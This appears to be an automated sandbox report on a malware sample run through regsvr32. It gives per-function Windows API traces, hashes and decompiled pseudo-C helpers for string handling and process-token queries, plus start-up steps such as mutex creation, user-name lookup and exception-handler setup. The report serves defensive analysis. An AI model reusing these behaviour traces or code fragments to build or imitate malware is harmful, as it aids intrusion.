                                • Part of subcall function 01033D4D: memcpy.NTDLL(00000000,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033E26
                              • GetLastError.KERNEL32 ref: 010294E8
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0102A2EC
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0102A310
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,00000000,?,00000000,010501F4,?,?,0102121E,?,00000000,?,?), ref: 0102A31E
                              • HeapFree.KERNEL32(00000000,?), ref: 01029504
                              • HeapFree.KERNEL32(00000000,?), ref: 01029515
                              • SetLastError.KERNEL32(00000000), ref: 01029518
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                              • String ID:
                              • API String ID: 2451549186-0
                              • Opcode ID: 708b4410c8bda05f85ea34eb6287c11563424273ea137173ef02470f6e588963
                              • Instruction ID: d8732443093d7f20931f66699a734be241f826ef5c0d3dba94765c365e57fa29
                              • Opcode Fuzzy Hash: 708b4410c8bda05f85ea34eb6287c11563424273ea137173ef02470f6e588963
                              • Instruction Fuzzy Hash: D8313836900229EFCF529FA9D9808DEBFB5FF44314F104156FA56A2124C7368A61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103EC94, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0102570C: lstrlenW.KERNEL32(?), ref: 01025730
                                • Part of subcall function 0102570C: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01025742
                                • Part of subcall function 0102570C: wcstombs.NTDLL ref: 01025750
                                • Part of subcall function 0102570C: lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 01025774
                                • Part of subcall function 0102570C: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 01025789
                                • Part of subcall function 0102570C: mbstowcs.NTDLL ref: 01025796
                                • Part of subcall function 0102570C: HeapFree.KERNEL32(00000000,00000000), ref: 010257A8
                                • Part of subcall function 0102570C: HeapFree.KERNEL32(00000000,00000000,?,?), ref: 010257C2
                              • GetLastError.KERNEL32 ref: 0103ED33
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0102A2EC
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0102A310
                                • Part of subcall function 0102A23E: HeapFree.KERNEL32(00000000,00000000,?,00000000,010501F4,?,?,0102121E,?,00000000,?,?), ref: 0102A31E
                              • HeapFree.KERNEL32(00000000,?), ref: 0103ED4F
                              • HeapFree.KERNEL32(00000000,?), ref: 0103ED60
                              • SetLastError.KERNEL32(00000000), ref: 0103ED63
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 3867366388-0
                              • Opcode ID: 6f2412b2f5847f244d87aeca7415c57daf2b65b91cc68eff8b351f7a25dd7dbe
                              • Instruction ID: 4910aaa6b11bc9b589218010c9a259fedb26a9cc92aa813a1dd4f02426842165
                              • Opcode Fuzzy Hash: 6f2412b2f5847f244d87aeca7415c57daf2b65b91cc68eff8b351f7a25dd7dbe
                              • Instruction Fuzzy Hash: B6316736900219FFCF52AF99DD848DEBFB9FF84310B004296FA55A2120C3368A61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103C263, Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 737eb687ca511fa961f2496be190838ce86df67e37f7c0bb2fc3b1ea4c0e27d3
                              • Instruction ID: 43252f5835a80a2c671a0a5c01c9430415aed13ba42eec97a5c49e1b7d97f9ab
                              • Opcode Fuzzy Hash: 737eb687ca511fa961f2496be190838ce86df67e37f7c0bb2fc3b1ea4c0e27d3
                              • Instruction Fuzzy Hash: 2C21D4B2500509BFEB605F94DD8096A7B7DFF093007440959EA85E6800D332F9B0CBD5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01038EAC, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(747C81D0,00000008,?,00000000,?,?,01042B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520,?,?,0102329A), ref: 01038EB8
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                                • Part of subcall function 0104849C: StrChrA.SHLWAPI(?,0000002F,00000000,747C81D0,01038EE6,747C81D0,00000001,00000001,?,?,01042B07,747C81D0,747C81D0,00000000,00000008,0000EA60), ref: 010484AA
                                • Part of subcall function 0104849C: StrChrA.SHLWAPI(?,0000003F,?,?,01042B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520,?,?,0102329A,?,?), ref: 010484B4
                              • memcpy.NTDLL(00000000,747C81D0,747C81D0,747C81D0,00000001,00000001,?,?,01042B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520), ref: 01038F16
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 01038F26
                              • lstrcpy.KERNEL32(00000000,747C81D0), ref: 01038F32
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: 9e90f2e9a2c1b56f9d93d71cd7497e59de6eb26c4e84b93efc0b6178832d04ad
                              • Instruction ID: 10f5793a57418b274de2f3843072be0e88bacb6ade99805b9448b9d83928daf8
                              • Opcode Fuzzy Hash: 9e90f2e9a2c1b56f9d93d71cd7497e59de6eb26c4e84b93efc0b6178832d04ad
                              • Instruction Fuzzy Hash: 0D21E7F6504215EFDB115F78C884AAF7FEDAF96280B058195FA859B202D735C90087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E282F, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E013E282F(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E013E55DC(_t2);
				if(_t34 != 0) {
					_t30 = E013E55DC(_t28);
					if(_t30 == 0) {
						E013E6DFA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E013EAAD2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E013EAAD2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                              0x013e282f
                              0x013e2839
                              0x013e283b
                              0x013e2841
                              0x013e2841
                              0x013e284a
                              0x013e284e
                              0x013e285a
                              0x013e285e
                              0x013e28d2
                              0x013e2860
                              0x013e2860
                              0x013e2864
                              0x013e286b
                              0x013e286e
                              0x013e2888
                              0x013e2877
                              0x013e2877
                              0x013e287b
                              0x013e287e
                              0x013e2883
                              0x013e2883
                              0x013e288d
                              0x013e28b5
                              0x013e28bb
                              0x013e28be
                              0x013e288f
                              0x013e2891
                              0x013e2899
                              0x013e28a4
                              0x013e28a9
                              0x013e28a9
                              0x013e28c5
                              0x013e28cc
                              0x013e28cd
                              0x013e28cd
                              0x013e285e
                              0x013e28dd

                              APIs
                              • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,013E56E4,00000000,00000000,?,03AD9618,?,?,013E3B91,?,03AD9618), ref: 013E283B
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                                • Part of subcall function 013EAAD2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,013E2869,00000000,00000001,00000001,?,?,013E56E4,00000000,00000000,?,03AD9618), ref: 013EAAE0
                                • Part of subcall function 013EAAD2: StrChrA.SHLWAPI(?,0000003F,?,?,013E56E4,00000000,00000000,?,03AD9618,?,?,013E3B91,?,03AD9618,0000EA60,?), ref: 013EAAEA
                              • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,013E56E4,00000000,00000000,?,03AD9618,?,?,013E3B91), ref: 013E2899
                              • lstrcpy.KERNEL32(00000000,?), ref: 013E28A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 013E28B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: 2aafc9fcbd05f34d31d65ff3c72e4a907492587b8efe806d0a16b724640f01bd
                              • Instruction ID: 8606fb2290edd4423b7d7023d4cd141dc3c166b799e4fe8b99f20df56e0d0cda
                              • Opcode Fuzzy Hash: 2aafc9fcbd05f34d31d65ff3c72e4a907492587b8efe806d0a16b724640f01bd
                              • Instruction Fuzzy Hash: 6421907250032AEBDB129F68C848AAF7FEDEF56258F054054FD499B281D735C944C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102E707, Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 88606a831818490d4dc6dcba95992888581799010516fa77a7e37b89fcee84fd
                              • Instruction ID: 703a994e8e13cbe2e82045f7376ae87c9458985fa75c4f2bc6061495a64f5af6
                              • Opcode Fuzzy Hash: 88606a831818490d4dc6dcba95992888581799010516fa77a7e37b89fcee84fd
                              • Instruction Fuzzy Hash: 4611C1B250052AFFDB109FA1DC80E9ABB68FF08300B050A29F68851801D332B5B19BD5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5434, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E5434(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E013E55DC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                              0x013e5449
                              0x013e544d
                              0x013e5457
                              0x013e545e
                              0x013e5461
                              0x013e5463
                              0x013e546b
                              0x013e5470
                              0x013e547e
                              0x013e5483
                              0x013e548d

                              APIs
                              • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,03AD93AC,?,013E4CD5,004F0053,03AD93AC,?,?,?,?,?,?,013E50D9), ref: 013E5444
                              • lstrlenW.KERNEL32(013E4CD5,?,013E4CD5,004F0053,03AD93AC,?,?,?,?,?,?,013E50D9), ref: 013E544B
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,013E4CD5,004F0053,03AD93AC,?,?,?,?,?,?,013E50D9), ref: 013E546B
                              • memcpy.NTDLL(747869A0,013E4CD5,00000002,00000000,004F0053,747869A0,?,?,013E4CD5,004F0053,03AD93AC), ref: 013E547E
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrlenmemcpy$AllocateHeap
                              • String ID:
                              • API String ID: 2411391700-0
                              • Opcode ID: 2d98f8a6fd4c17f0845e53b6ea2791998824af2bfa05b940ab610deeabf0a07a
                              • Instruction ID: e03992f04547bcad4e60c0a550472b064b7e7199d97b03b2cedeaff46ab3fb83
                              • Opcode Fuzzy Hash: 2d98f8a6fd4c17f0845e53b6ea2791998824af2bfa05b940ab610deeabf0a07a
                              • Instruction Fuzzy Hash: 58F03C36900229FBCB10EFA9CC48CDE7BECEF092587114062E904D7141E735EA108BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103951E, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(69B25F44,?,?,00000000,0103069E,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 0103952F
                              • lstrlen.KERNEL32(?,?,?,00000000,0103069E,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 01039534
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,0103069E,00000000,?,?,00000000,69B25F44,?,?,?), ref: 01039550
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103956E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                              • String ID:
                              • API String ID: 1697500751-0
                              • Opcode ID: 0ba67b05a7ef06509a1967b8600f885df69830e5567bc044c418b233e038e6c5
                              • Instruction ID: e8cb39f03d0f543ed0931971a3273dbeb27718043b0e44e49f0f24e8050ad2a7
                              • Opcode Fuzzy Hash: 0ba67b05a7ef06509a1967b8600f885df69830e5567bc044c418b233e038e6c5
                              • Instruction Fuzzy Hash: C3F022BA500701ABE3219AAD9C48E5BBF9CAFC4311B450555FAC183105D335C4008BB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01033EA2, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(04B3BFB8,00000000,00000000,74785520,0103F2A8,00000000), ref: 01033EB2
                              • lstrlen.KERNEL32(?), ref: 01033EBA
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(00000000,04B3BFB8), ref: 01033ECE
                              • lstrcat.KERNEL32(00000000,?), ref: 01033ED9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: 8be140e0a82febe8cd25cd6ccff238edc4253a90186a12d328d9ba16e4562906
                              • Instruction ID: 327b295187c0da3058df843554890c8d917ef1807cc6128063bd50047dbe19db
                              • Opcode Fuzzy Hash: 8be140e0a82febe8cd25cd6ccff238edc4253a90186a12d328d9ba16e4562906
                              • Instruction Fuzzy Hash: 84E01B776016259B87215FE8AC88C5FBBACFFD9751304441AF681D7108C739981587A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6F6D, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(03AD9B58,00000000,00000000,?,013E6507,00000000), ref: 013E6F7D
                              • lstrlen.KERNEL32(?), ref: 013E6F85
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • lstrcpy.KERNEL32(00000000,03AD9B58), ref: 013E6F99
                              • lstrcat.KERNEL32(00000000,?), ref: 013E6FA4
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: 6b4a898d45f0a3ec1e458289dc2d4411804295fa4a064c687f5d69ad0182cfbb
                              • Instruction ID: 7be41db40f3975574d433ca06634604a3c4e0fc698fb21ee50a4a102f2c239b3
                              • Opcode Fuzzy Hash: 6b4a898d45f0a3ec1e458289dc2d4411804295fa4a064c687f5d69ad0182cfbb
                              • Instruction Fuzzy Hash: 46E06D73501325ABC6319BE8AC48C9FBBEDEF9A725B040416F600D7144C724CC098BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Analysis Process: regsvr32.exe PID: 7016 Parent PID: 6132 regsvr32.exeCOMMON

                              Executed Functions

                              Function 053C4D95, Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                              Download Yara Rule
                              APIs
                              • RtlInitializeCriticalSection.NTDLL(053F0488), ref: 053C4DB3
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • memset.NTDLL ref: 053C4DE4
                              • RtlInitializeCriticalSection.NTDLL(064FC0A0), ref: 053C4DF5
                                • Part of subcall function 053E45CE: RtlInitializeCriticalSection.NTDLL(053F0460), ref: 053E45F2
                                • Part of subcall function 053E45CE: RtlInitializeCriticalSection.NTDLL(053F0440), ref: 053E4608
                                • Part of subcall function 053E45CE: GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053E4619
                                • Part of subcall function 053E45CE: GetModuleHandleA.KERNEL32(00001597,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053E464D
                                • Part of subcall function 053D465E: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 053D4678
                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,00000000,?,?,?,?,?,?,?,?,?,053D940A), ref: 053C4E1E
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C4E2F
                              • CloseHandle.KERNEL32(000007D0,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C4E43
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 053C4E8C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053C4E9F
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 053C4EB4
                              • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 053C4EE4
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053C4EF9
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C4F03
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C4F10
                              • GetShellWindow.USER32 ref: 053C4F2B
                              • GetWindowThreadProcessId.USER32(00000000), ref: 053C4F32
                              • memcpy.NTDLL(053F0354,?,00000018,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053C4F6E
                              • CreateEventA.KERNEL32(053F0244,00000001,00000000,00000000,?,00000001,?,00000000), ref: 053C4FEC
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 053C5016
                              • OpenEventA.KERNEL32(00100000,00000000,064FB9D0,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053C503E
                              • CreateEventA.KERNEL32(053F0244,00000001,00000000,064FB9D0,?,00000000,?,?,?,?,?,?,?,?,?,053D940A), ref: 053C5053
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C5059
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C50F1
                              • SetEvent.KERNEL32(?,Function_000115C8,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A), ref: 053C5187
                              • RtlAllocateHeap.NTDLL(00000000,00000043,Function_000115C8), ref: 053C519C
                              • wsprintfA.USER32 ref: 053C51CC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                              • String ID:
                              • API String ID: 3929413950-0
                              • Opcode ID: ea2d65899f7905b11e5396d028a872c060c9a335e15c8944e7628862ae799b39
                              • Instruction ID: 8424f49a1029061c6a5a00b30e9a9ed004d94f9b26249982cb52208c3e7b370f
                              • Opcode Fuzzy Hash: ea2d65899f7905b11e5396d028a872c060c9a335e15c8944e7628862ae799b39
                              • Instruction Fuzzy Hash: 2AC188B5624305AFCB24DF69E84E92BBFE9FB85701F40485EF5478B241DBB1A804CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D92F6, Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrRChrA.SHLWAPI(064FB5B0,00000000,0000005C,?,?,?), ref: 053D9332
                              • _strupr.NTDLL ref: 053D9348
                              • lstrlen.KERNEL32(064FB5B0,?,?), ref: 053D9350
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 053D93D0
                              • RtlAddVectoredExceptionHandler.NTDLL(00000000,053D37EE), ref: 053D93F7
                              • GetLastError.KERNEL32(?,?), ref: 053D9411
                              • RtlRemoveVectoredExceptionHandler.NTDLL(04AD05B8), ref: 053D9427
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                              • String ID:
                              • API String ID: 2251957091-0
                              • Opcode ID: ff557889cffb44f938ef909eeeb7cee59ec1e6afc9e8ee30869a4f257de20770
                              • Instruction ID: 6b42c0d00c349012bb9980e1db996b729e9d0d42f743f582085c00bb75bd4a15
                              • Opcode Fuzzy Hash: ff557889cffb44f938ef909eeeb7cee59ec1e6afc9e8ee30869a4f257de20770
                              • Instruction Fuzzy Hash: 0D31D173A141209FDB259BB8FC8EA7EBFBDB704714F450529F913EB182DA7099408760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6C06, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 38%
                              			E049D6C06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E049D55DC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E049D6DFA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                              0x049d6c13
                              0x049d6c14
                              0x049d6c15
                              0x049d6c16
                              0x049d6c17
                              0x049d6c1b
                              0x049d6c22
                              0x049d6c31
                              0x049d6c34
                              0x049d6c37
                              0x049d6c3e
                              0x049d6c41
                              0x049d6c44
                              0x049d6c47
                              0x049d6c4a
                              0x049d6c55
                              0x049d6c57
                              0x049d6c60
                              0x049d6c68
                              0x049d6c6a
                              0x049d6c7c
                              0x049d6c86
                              0x049d6c8a
                              0x049d6c99
                              0x049d6c9d
                              0x049d6ca6
                              0x049d6cae
                              0x049d6cae
                              0x049d6cb0
                              0x049d6cb0
                              0x049d6cb8
                              0x049d6cbe
                              0x049d6cc2
                              0x049d6cc2
                              0x049d6ccd

                              APIs
                              • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 049D6C4D
                              • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 049D6C60
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 049D6C7C
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 049D6C99
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 049D6CA6
                              • NtClose.NTDLL(?), ref: 049D6CB8
                              • NtClose.NTDLL(00000000), ref: 049D6CC2
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: 8992affb6f8b6baa22f21546e68c4479d8a7230bb9457cdcd5829e377fc6676c
                              • Instruction ID: 7c0b56072dbe3803e12f0f368fb748ad103635dd926dbacdf058f069c2f84c97
                              • Opcode Fuzzy Hash: 8992affb6f8b6baa22f21546e68c4479d8a7230bb9457cdcd5829e377fc6676c
                              • Instruction Fuzzy Hash: 4E212872900228BFDB019FA5DC45DDEBFBDEF48754F108022FA05E6110D7719A44DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CB0A5, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 053CB0EC
                              • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 053CB0FF
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 053CB11B
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 053CB138
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 053CB145
                              • NtClose.NTDLL(?), ref: 053CB157
                              • NtClose.NTDLL(?), ref: 053CB161
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
